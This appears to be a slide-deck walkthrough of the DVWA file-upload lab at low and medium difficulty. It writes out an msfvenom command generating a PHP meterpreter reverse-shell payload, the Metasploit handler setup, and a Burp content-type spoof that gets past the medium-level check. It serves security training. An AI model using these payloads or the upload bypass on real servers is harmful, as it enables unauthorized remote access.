File Upload
Walkthrough on DVWA
LOW + MEDIUM
Difficulty
1
�File upload vulnerability is a vulnerability in web applications
that allows an attacker to upload malicious files to the server.
These files can then be executed on the server, potentially giving
the attacker unauthorized access to sensitive information, the
ability to execute arbitrary code, and the ability to launch further
attacks. The vulnerability typically arises when the application
does not properly validate or sanitize the file being uploaded,
allowing the attacker to upload a file with a malicious payload.
� You should be on Kali Linux or Parrot
OS in VMWARE, Virtual Box or running
natively on your PC
3
�Low-difficulty DVWA
File Upload
4
� Step- 1
Go to DVWA security settings and set the difficulty to low
5
� Step- 2
Create a msfvenom payload on your kali machine
msfvenom ‐p php/meterpreter/reverse_tcp LHOST=127.0.0.1
LPORT=4444 ‐f raw >exploit.php
6
� Step- 3
Now run Metasploit and start a multi‐handler to listen to PHP
reverse sessions.
>use exploit/multi/handler set payload
>php/meterpreter/reverse_tcp
7
� Step- 4
Now upload the file. The file will be uploaded without any
restriction. And then open it in the browser
8
� Step- 5
On Opening the file, we will get the reverse shell
9
�Medium-difficulty DVWA
File Upload
10
� Step- 1
Go to DVWA security settings and set the difficulty to medium
11
� Step- 2
Create a msfvenom payload on your kali machine
msfvenom ‐p php/meterpreter/reverse_tcp LHOST=127.0.0.1
LPORT=4444 ‐f raw >exploit.php
12
� Step- 3
Now run Metasploit and start a multi‐handler to listen to PHP
reverse sessions.
>use exploit/multi/handler set payload
>php/meterpreter/reverse_tcp
13
� Step- 4
Now upload the file. The file will be not be uploaded. In
Medium Difficulty, the server checks for file content type and
if it is not a jpeg image, it does not upload it.
14
� Step- 5
Fire up the Burp, try to upload the same shell generated in the
previous step and capture the request in Burp. Now, send it to
the repeater. And change the content type from application/x‐
php to image/jpeg.
15
� Step- 6
Now upload the shell and browse to the uploaded file. We will
get the reverse shell.
16
�DEMO
17
�THANKS
18
